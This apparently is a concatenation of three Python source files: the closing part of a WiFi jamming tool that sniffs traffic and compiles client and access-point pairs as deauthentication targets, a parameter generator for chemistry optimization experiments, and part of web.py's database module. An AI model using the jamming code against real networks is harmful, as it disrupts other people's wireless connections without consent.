print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore += [addr.lower() for addr in skip]
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
# track bssid for essid
if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint:
args.accesspoint.add(pkt[Dot11].addr3.lower())
# bail if bssid is not in target list
if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]):
# pkt does not match our target list
return
if args.skip:
if pkt.addr2 in args.skip:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, mon_channel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, mon_channel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
args.skip = list(map(str.lower, args.skip))
# lowercase bssids while leaving essids intact
args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint)
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0) |
param_generator.py | #!/usr/bin/env python
__author__ = 'Florian Hase'
#========================================================================
import copy
import numpy as np
from threading import Thread
from DatabaseManager.database import Database
from Utilities.misc import Printer
#========================================================================
#========================================================================
class ParamGenerator(Printer):
BUSY = {}
DB_ATTRIBUTES = {'exp_identifier': 'string',
'status': 'integer',
'parameters': 'pickle',
'sampling_parameter_value': 'integer'}
OPTIMIZER = None
PARAM_STATUS = {}
TARGET_SPECS = {}
# add generated parameters as attributes to the parameter generator with a unique attribute name
# then, have chemOS pick up the generated parameters and dump them in the respective database
# make sure, to always properly destroy the attributes after they have been dumped
def __init__(self, settings, verbose = True):
Printer.__init__(self, 'PARAMETER GENERATOR')
self.settings = settings
self.verbose = verbose
self.settings['algorithm']['scratch_dir'] = self.settings['scratch_dir']
# importing the wrappers here allows to use one optimimization algorithm
# without having installed the others
if self.settings['algorithm']['name'] == 'phoenics':
from ParamGenerator.Phoenics.phoenics_wrapper import PhoenicsWrapper
self.optimization_algorithm = PhoenicsWrapper(self.settings['algorithm'])
elif self.settings['algorithm']['name'] == 'smac':
from ParamGenerator.SMAC.smac_wrapper import SmacWrapper
self.optimization_algorithm = SmacWrapper(self.settings['algorithm'])
elif self.settings['algorithm']['name'] == 'spearmint':
from ParamGenerator.Spearmint.spearmint_wrapper import SpearmintWrapper
self.optimization_algorithm = SpearmintWrapper(self.settings['algorithm'])
elif self.settings['algorithm']['name'] == 'random_search':
from ParamGenerator.RandomSearch.random_search_wrapper import RandomsearchWrapper
self.optimization_algorithm = RandomsearchWrapper(self.settings['algorithm'])
else:
raise NotImplementedError
self.BUSY = {experiment['name']: False for experiment in self.settings['experiments']}
self.number_proposed_parameters = {experiment['name']: 0 for experiment in self.settings['experiments']}
self._create_database()
self.number_proposed_recipes = {}
def _create_database(self):
db_settings = self.settings['param_database']
self.database = Database(db_settings['path'], self.DB_ATTRIBUTES,
db_settings['database_type'], verbose = self.verbose)
def _get_experiment(self, identifier):
for experiment in self.settings['experiments']:
if experiment['name'] == identifier:
break
return experiment
def _get_random_parameters(self, identifier):
# get experiment settings
experiment = self._get_experiment(identifier)
# with self.optimization_algorithm.get_instance(identifier, experiment) as optimizer:
optimizer = self.optimization_algorithm.get_instance(identifier, experiment)
# with self.optimization_algorithm(identifier, experiment) as optimizer:
normalized_parameter = optimizer.choose()
del optimizer
parameter = self._rescale_parameters(normalized_parameter, identifier)
# we need to rescale the
return parameter
def _get_sampling_parameter(self, identifier):
if not identifier in self.number_proposed_parameters.keys():
self.number_proposed_parameters[identifier] = 0
return self.number_proposed_parameters[identifier] % self.settings['algorithm']['batch_size']
def select_parameters(self, identifier):
sampling_parameter = self._get_sampling_parameter(identifier)
condition = {'exp_identifier': identifier, 'sampling_parameter_value': sampling_parameter, 'status': 0}
target = 'parameters'
parameter = self.database.fetch(condition, target)
# check if we got parameters from the database
retrain = False
if type(parameter).__name__ != 'ndarray':
# we did not get a valid set of parameters, so we need to generate a random parameter set
parameter = self._get_random_parameters(identifier)
retrain = True
else:
# update the status
update = {'status': 1}
self.database.update(condition, update)
wait = retrain and self.BUSY[identifier]
parameter = np.squeeze(parameter)
if not wait:
self.number_proposed_parameters[identifier] += 1
return parameter, wait, retrain
def remove_parameters(self, identifier):
condition = {'exp_identifier': identifier}
self.database.remove_all(condition)
def _normalize_observations(self, observations, exp_identifier):
# get experiment
experiment = self._get_experiment(exp_identifier)
var_names = [variable['name'] for variable in experiment['variables']]
var_lows = [variable['low'] for variable in experiment['variables']]
var_highs = [variable['high'] for variable in experiment['variables']]
rescaled_observations = []
for observation in observations:
rescaled_observation = copy.deepcopy(observation)
for var_index, var_name in enumerate(var_names):
value = rescaled_observation[var_name]['samples']
# FIXME: for now, only linear rescaling
rescaled_observation[var_name]['samples'] = (value - var_lows[var_index]) / (var_highs[var_index] - var_lows[var_index])
rescaled_observations.append(rescaled_observation)
return rescaled_observations
def _rescale_parameters(self, normalized_parameters, exp_identifier):
experiment = self._get_experiment(exp_identifier)
var_names = [variable['name'] for variable in experiment['variables']]
var_lows = [variable['low'] for variable in experiment['variables']]
var_highs = [variable['high'] for variable in experiment['variables']]
var_sizes = [variable['size'] for variable in experiment['variables']]
parameters = []
for norm_param in normalized_parameters:
start_index = 0
param = []
for var_index, var_name in enumerate(var_names):
values = norm_param[start_index : start_index + var_sizes[var_index]]
# FIXME: for now, only linear rescaling
rescaled = (var_highs[var_index] - var_lows[var_index]) * values + var_lows[var_index]
param.extend(rescaled)
start_index += var_sizes[var_index]
parameters.append(np.copy(param))
parameters = np.array(parameters)
return parameters
def kill_running_instances(self, exp_identifier):
self._print('killing parameter generation for %s' % exp_identifier)
# just need to stop the thread
self.PARAM_STATUS[exp_identifier] = 'trash'
def _parameter_generation(self):
optimizer = self._optimizer
exp_identifier = self._exp_identifier
self._print('initializing learning procedure')
# we need to rescale the parameters here!
# rescaled_observations = self._normalize_observations(self.TARGET_SPECS[exp_identifier], exp_identifier)
# normalized_parameters = optimizer.choose(observations = rescaled_observations)
normalized_parameters = optimizer.choose(observations = self.TARGET_SPECS[exp_identifier])
parameters = self._rescale_parameters(normalized_parameters, exp_identifier)
if self.PARAM_STATUS[exp_identifier] == 'usable':
# updating database
self._print('updating parameter database')
for parameter in parameters:
print('\t', parameter, np.linalg.norm(parameter))
condition = {'exp_identifier': exp_identifier}
new_entries = [{'exp_identifier': exp_identifier,
'status': 0, 'parameters': parameters[index], 'sampling_parameter_value': index} for index in range(len(parameters))]
self.database.replace(condition, new_entries)
else:
self._print('found only trash results')
# reset
del self.TARGET_SPECS[exp_identifier]
del self.PARAM_STATUS[exp_identifier]
self.BUSY[exp_identifier] = False
del self._optimizer
def generate_new_parameters(self, exp_identifier):
for experiment in self.settings['experiments']:
if experiment['name'] == exp_identifier:
break
# check if busy
try:
busy = self.BUSY[exp_identifier]
except KeyError:
busy = False
if busy:
return None
self.BUSY[exp_identifier] = True
self._print('starting parameter generation process for %s' % exp_identifier)
self._print('getting optimizer instance')
self._optimizer = self.optimization_algorithm.get_instance(exp_identifier, experiment)
self._exp_identifier = exp_identifier
self._print('submitting training process')
# running the parameter generation locally
# FIXME: CHANGE CODE HERE TO IMPLEMENT TRAINING ON OTHER COMPUTING RESOURCES!
generation_thread = Thread(target = self._parameter_generation)
self.PARAM_STATUS[exp_identifier] = 'usable'
generation_thread.start()
|
db.py | """
Database API
from web.py
"""
__all__ = [
"UnknownParamstyle", "UnknownDB", "TransactionError",
"sqllist", "sqlors", "reparam", "sqlquote",
"SQLQuery", "SQLParam", "sqlparam",
"SQLLiteral", "sqlliteral",
"database", 'DB',
]
import time
import os
import urllib
import itertools
import pymysql
pymysql.install_as_MySQLdb()
try:
import datetime
except ImportError:
datetime = None
try:
set
except NameError:
from sets import Set as set
try:
from threading import local as threadlocal
except ImportError:
from .python23 import threadlocal
import sys
debug = sys.stderr
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
iters.append(set)
if sys.version_info < (2, 6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
pass
class _hack(tuple):
pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
For boolean test, IterBetter peeps at first value in the itertor
without effecting the iteration.
>>> c = iterbetter(iter(range(5)))
>>> bool(c)
True
>>> list(c)
[0, 1, 2, 3, 4]
>>> c = iterbetter(iter([]))
>>> bool(c)
False
>>> list(c)
[]
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
if hasattr(self, "_head"):
yield self._head
while True:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
# todo: slices
if i < self.c:
raise IndexError("already passed " + str(i))
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError(str(i))
def __nonzero__(self):
if hasattr(self, "__len__"):
return len(self) != 0
elif hasattr(self, "_head"):
return True
else:
try:
self._head = self.i.next()
except StopIteration:
return False
else:
return True
iterbetter = IterBetter
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
t = type(obj)
if t is unicode:
return obj
elif t is str:
return obj.decode(encoding)
elif t in [int, float, bool]:
return unicode(obj)
elif hasattr(obj, '__unicode__') or isinstance(obj, unicode):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode(encoding)
elif isinstance(obj, str):
return obj
elif hasattr(obj, 'next'): # iterator
return itertools.imap(safestr, obj)
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
config = Storage()
class ThreadedDict(threadlocal):
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
...
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
_instances = set()
def __init__(self):
ThreadedDict._instances.add(self)
def __del__(self):
ThreadedDict._instances.remove(self)
def __hash__(self):
return id(self)
def clear_all():
"""Clears all ThreadedDict instances.
"""
for t in list(ThreadedDict._instances):
t.clear()
clear_all = staticmethod(clear_all)
# Define all these methods to more or less fully emulate dict -- attribute access
# is built into threading.local.
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, value):
self.__dict__[key] = value
def __delitem__(self, key):
del self.__dict__[key]
def __contains__(self, key):
return key in self.__dict__
has_key = __contains__
def clear(self):
self.__dict__.clear()
def copy(self):
return self.__dict__.copy()
def get(self, key, default=None):
return self.__dict__.get(key, default)
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def iterkeys(self):
return self.__dict__.iterkeys()
iter = iterkeys
def values(self):
return self.__dict__.values()
def itervalues(self):
return self.__dict__.itervalues()
def pop(self, key, *args):
return self.__dict__.pop(key, *args)
def popitem(self):
return self.__dict__.popitem()
def setdefault(self, key, default=None):
return self.__dict__.setdefault(key, default)
def update(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def __repr__(self):
return '<ThreadedDict %r>' % self.__dict__
__str__ = __repr__
threadeddict = ThreadedDict
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
class _ItplError(ValueError):
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
class TransactionError(Exception):
pass
class UnknownParamstyle(Exception):
"""
raised for unsupported db paramstyles
(currently supported: qmark, numeric, format, pyformat)
"""
pass
class SQLParam(object):
"""
Parameter in SQLQuery.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
>>> q
<sql: "SELECT * FROM test WHERE name='joe'">
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.values()
['joe']
"""
__slots__ = ["value"]
def __init__(self, value):
self.value = value
def get_marker(self, paramstyle='pyformat'):
if paramstyle == 'qmark':
return '?'
elif paramstyle == 'numeric':
return ':1'
elif paramstyle is None or paramstyle in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(paramstyle)
def sqlquery(self):
return SQLQuery([self])
def __add__(self, other):
return self.sqlquery() + other
def __radd__(self, other):
return other + self.sqlquery()
def __str__(self):
return str(self.value)
def __repr__(self):
return '<param: %s>' % repr(self.value)
sqlparam = SQLParam
class SQLQuery(object):
"""
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `vars`
and the function will call reparam for you.
Internally, consists of `items`, which is a list of strings and
SQLParams, which get concatenated to produce the actual query.
"""
__slots__ = ["items"]
# tested in sqlquote's docstring
def __init__(self, items=None):
r"""Creates a new SQLQuery.
>>> SQLQuery("x")
<sql: 'x'>
>>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
>>> q
<sql: 'SELECT * FROM test WHERE x=1'>
>>> q.query(), q.values()
('SELECT * FROM test WHERE x=%s', [1])
>>> SQLQuery(SQLParam(1))
<sql: '1'>
"""
if items is None:
self.items = []
elif isinstance(items, list):
self.items = items
elif isinstance(items, SQLParam):
self.items = [items]
elif isinstance(items, SQLQuery):
self.items = list(items.items)
else:
self.items = [items]
# Take care of SQLLiterals
for i, item in enumerate(self.items):
if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
self.items[i] = item.value.v
def append(self, value):
self.items.append(value)
def __add__(self, other):
if isinstance(other, basestring):
items = [other]
elif isinstance(other, SQLQuery):
items = other.items
else:
return NotImplemented
return SQLQuery(self.items + items)
def __radd__(self, other):
if isinstance(other, basestring):
items = [other]
else:
return NotImplemented
return SQLQuery(items + self.items)
def __iadd__(self, other):
if isinstance(other, (basestring, SQLParam)):
self.items.append(other)
elif isinstance(other, SQLQuery):
self.items.extend(other.items)
else:
return NotImplemented
return self
def __len__(self):
return len(self.query())
def query(self, paramstyle=None):
"""
Returns the query part of the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.query()
'SELECT * FROM test WHERE name=%s'
>>> q.query(paramstyle='qmark')
'SELECT * FROM test WHERE name=?'
"""
s = []
for x in self.items:
if isinstance(x, SQLParam):
x = x.get_marker(paramstyle)
s.append(safestr(x))
else:
x = safestr(x)
# automatically escape % characters in the query
# For backward compatability, ignore escaping when the query
# looks already escaped
if paramstyle in ['format', 'pyformat']:
if '%' in x and '%%' not in x:
x = x.replace('%', '%%')
s.append(x)
return "".join(s)
def values(self):
"""
Returns the values of the parameters used in the sql query.
>>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
>>> q.values()
['joe']
"""
return [i.value for i in self.items if isinstance(i, SQLParam)]
def join(items, sep=' ', prefix=None, suffix=None, target=None):
"""
Joins multiple queries.
>>> SQLQuery.join(['a', 'b'], ', ')
<sql: 'a, b'>
Optinally, prefix and suffix arguments can be provided.
>>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
<sql: '(a, b)'>
If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
"""
if target is None:
target = SQLQuery()
target_items = target.items
if prefix:
target_items.append(prefix)
for i, item in enumerate(items):
if i != 0:
target_items.append(sep)
if isinstance(item, SQLQuery):
target_items.extend(item.items)
else:
target_items.append(item)
if suffix:
target_items.append(suffix)
return target
join = staticmethod(join)
def _str(self):
try:
return self.query() % tuple([sqlify(x) for x in self.values()])
except (ValueError, TypeError):
return self.query()
def __str__(self):
return safestr(self._str())
def __unicode__(self):
return safeunicode(self._str())
def __repr__(self):
return '<sql: %s>' % repr(str(self))
class SQLLiteral:
"""
Protects a string from `sqlquote`.
>>> sqlquote('NOW()')
<sql: "'NOW()'">
>>> sqlquote(SQLLiteral('NOW()'))
<sql: 'NOW()'>
"""
def __init__(self, v):
self.v = v
def __repr__(self):
return self.v
sqlliteral = SQLLiteral
def _sqllist(values):
"""
>>> _sqllist([1, 2, 3])
<sql: '(1, 2, 3)'>
"""
items = []
items.append('(')
for i, v in enumerate(values):
if i != 0:
items.append(', ')
items.append(sqlparam(v))
items.append(')')
return SQLQuery(items)
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns an `SQLQuery` for the result.
>>> reparam("s = $s", dict(s=True))
<sql: "s = 't'">
>>> reparam("s IN $s", dict(s=[1, 2]))
<sql: 's IN (1, 2)'>
"""
dictionary = dictionary.copy() # eval mucks with it
vals = []
result = []
for live, chunk in _interpolate(string_):
if live:
v = eval(chunk, dictionary)
result.append(sqlquote(v))
else:
result.append(chunk)
return SQLQuery.join(result, '')
def sqlify(obj):
"""
converts `obj` to its proper SQL version
>>> sqlify(None)
'NULL'
>>> sqlify(True)
"'t'"
>>> sqlify(3)
'3'
"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif isinstance(obj, long):
return str(obj)
elif datetime and isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
if isinstance(obj, unicode):
obj = obj.encode('utf8')
return repr(obj)
def sqllist(lst):
"""
Converts the arguments for use in something like a WHERE clause.
>>> sqllist(['a', 'b'])
'a, b'
>>> sqllist('a')
'a'
>>> sqllist(u'abc')
u'abc'
"""
if isinstance(lst, basestring):
return lst
else:
return ', '.join(lst)
def sqlors(left, lst):
"""
`left is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
>>> sqlors('foo = ', [])
<sql: '1=2'>
>>> sqlors('foo = ', [1])
<sql: 'foo = 1'>
>>> sqlors('foo = ', 1)
<sql: 'foo = 1'>
>>> sqlors('foo = ', [1,2,3])
<sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return SQLQuery("1=2")
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return SQLQuery(['('] +
sum([[left, sqlparam(x), ' OR '] for x in lst], []) +
['1=2)']
)
else:
return left + sqlparam(lst)
def sqlwhere(dictionary, grouping=' AND '):
"""
Converts a `dictionary` to an SQL WHERE clause `SQLQuery`.
>>> sqlwhere({'cust_id': 2, 'order_id':3})
<sql: 'order_id = 3 AND cust_id = 2'>
>>> sqlwhere({'cust_id': 2, 'order_id':3}, grouping=', ')
<sql: 'order_id = 3, cust_id = 2'>
>>> sqlwhere({'a': 'a', 'b': 'b'}).query()
'a = %s AND b = %s'
"""
return SQLQuery.join([k + ' = ' + sqlparam(v) for k, v in dictionary.items()], grouping)
def sqlquote(a):
"""
Ensures `a` is quoted properly for use in a SQL query.
>>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
<sql: "WHERE x = 't' AND y = 3">
>>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
<sql: "WHERE x = 't' AND y IN (2, 3)">
"""
if isinstance(a, list):
return _sqllist(a)
else:
return sqlparam(a).sqlquery()
class Transaction:
"""Database transaction."""
def __init__(self, ctx):
self.ctx = ctx
self.transaction_count = transaction_count = len(ctx.transactions)
class transaction_engine:
"""Transaction Engine used in top level transactions."""
def do_transact(self):
ctx.commit(unload=False)
def do_commit(self):
ctx.commit()
def do_rollback(self):
ctx.rollback()
class subtransaction_engine:
"""Transaction Engine used in sub transactions."""
def query(self, q):
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
def do_transact(self):
self.query('SAVEPOINT webpy_sp_%s')
def do_commit(self):
self.query('RELEASE SAVEPOINT webpy_sp_%s')
def do_rollback(self):
self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
class dummy_engine:
"""Transaction Engine used instead of subtransaction_engine
when sub transactions are not supported."""
do_transact = do_commit = do_rollback = lambda self: None
if self.transaction_count:
# nested transactions are not supported in some databases
if self.ctx.get('ignore_nested_transactions'):
self.engine = dummy_engine()
else:
self.engine = subtransaction_engine()
else:
self.engine = transaction_engine()
self.engine.do_transact()
self.ctx.transactions.append(self)
def __enter__(self):
return self
def __exit__(self, exctype, excvalue, traceback):
if exctype is not None:
self.rollback()
else:
self.commit()
def commit(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_commit()
self.ctx.transactions = self.ctx.transactions[
:self.transaction_count]
def rollback(self):
if len(self.ctx.transactions) > self.transaction_count:
self.engine.do_rollback()
self.ctx.transactions = self.ctx.transactions[
:self.transaction_count]
class DB:
"""Database"""
def __init__(self, db_module, keywords):
"""Creates a database.
"""
# some DB implementaions take optional paramater `driver` to use a specific driver modue
# but it should not be passed to connect
keywords.pop('driver', None)
self.db_module = db_module
self.keywords = keywords
self._ctx = threadeddict()
# flag to enable/disable printing queries
self.printing = config.get('debug_sql', config.get('debug', False))
self.supports_multiple_insert = False
try:
import DBUtils
# enable pooling if DBUtils module is available.
self.has_pooling = True
except ImportError:
self.has_pooling = False
# Pooling can be disabled by passing pooling=False in the keywords.
self.has_pooling = self.keywords.pop(
'pooling', True) and self.has_pooling
def _getctx(self):
if not self._ctx.get('db'):
self._load_context(self._ctx)
return self._ctx
ctx = property(_getctx)
def _load_context(self, ctx):
ctx.dbq_count = 0
ctx.transactions = [] # stack of transactions
if self.has_pooling:
ctx.db = self._connect_with_pooling(self.keywords)
else:
ctx.db = self._connect(self.keywords)
ctx.db_execute = self._db_execute
if not hasattr(ctx.db, 'commit'):
ctx.db.commit = lambda: None
if not hasattr(ctx.db, 'rollback'):
ctx.db.rollback = lambda: None
def commit(unload=True):
# do db commit and release the connection if pooling is enabled.
ctx.db.commit()
if unload and self.has_pooling:
self._unload_context(self._ctx)
def rollback():
# do db rollback and release the connection if pooling is enabled.
ctx.db.rollback()
if self.has_pooling:
self._unload_context(self._ctx)
ctx.commit = commit
ctx.rollback = rollback
def _unload_context(self, ctx):
del ctx.db
def _connect(self, keywords):
return self.db_module.connect(**keywords)
def _connect_with_pooling(self, keywords):
def get_pooled_db():
from DBUtils import PooledDB
# In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
# see Bug#122112
if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
else:
return PooledDB.PooledDB(creator=self.db_module, **keywords)
if getattr(self, '_pooleddb', None) is None:
self._pooleddb = get_pooled_db()
return self._pooleddb.connection()
def _db_cursor(self):
return self.ctx.db.cursor()
def _param_marker(self):
"""Returns parameter marker based on paramstyle attribute if this database."""
style = getattr(self, 'paramstyle', 'pyformat')
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle(style)
def _db_execute(self, cur, sql_query):
"""executes an sql query"""
self.ctx.dbq_count += 1
try:
a = time.time()
query, params = self._process_query(sql_query)
out = cur.execute(query, params)
b = time.time()
except:
if self.printing:
print >> debug, 'ERR:', str(sql_query)
if self.ctx.transactions:
self.ctx.transactions[-1].rollback()
else:
self.ctx.rollback()
raise
if self.printing:
print >> debug, '%s (%s): %s' % (round(
b-a, 2), self.ctx.dbq_count, str(sql_query))
return out
def _process_query(self, sql_query):
"""Takes the SQLQuery object and returns query string and parameters.
"""
paramstyle = getattr(self, 'paramstyle', 'pyformat')
query = sql_query.query(paramstyle)
params = sql_query.values()
return query, params
def _where(self, where, vars):
if isinstance(where, (int, long)):
where = "id = " + sqlparam(where)
#@@@ for backward-compatibility
elif isinstance(where, (list, tuple)) and len(where) == 2:
where = SQLQuery(where[0], where[1])
elif isinstance(where, SQLQuery):
pass
else:
where = reparam(where, vars)
return where
def query(self, sql_query, vars=None, processed=False, _test=False):
"""
Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
If `processed=True`, `vars` is a `reparam`-style list to use
instead of interpolating.
>>> db = DB(None, {})
>>> db.query("SELECT * FROM foo", _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.query("SELECT * FROM foo WHERE x = $x", vars=dict(x='f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
>>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
<sql: "SELECT * FROM foo WHERE x = 'f'">
"""
if vars is None:
vars = {}
if not processed and not isinstance(sql_query, SQLQuery):
sql_query = reparam(sql_query, vars)
if _test:
return sql_query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, sql_query)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = iterbetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [storage(dict(zip(names, x)))
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not self.ctx.transactions:
self.ctx.commit()
return out
def select(
self, tables, vars=None, what='*', where=None, order=None, group=None,
limit=None, offset=None, _test=False):
"""
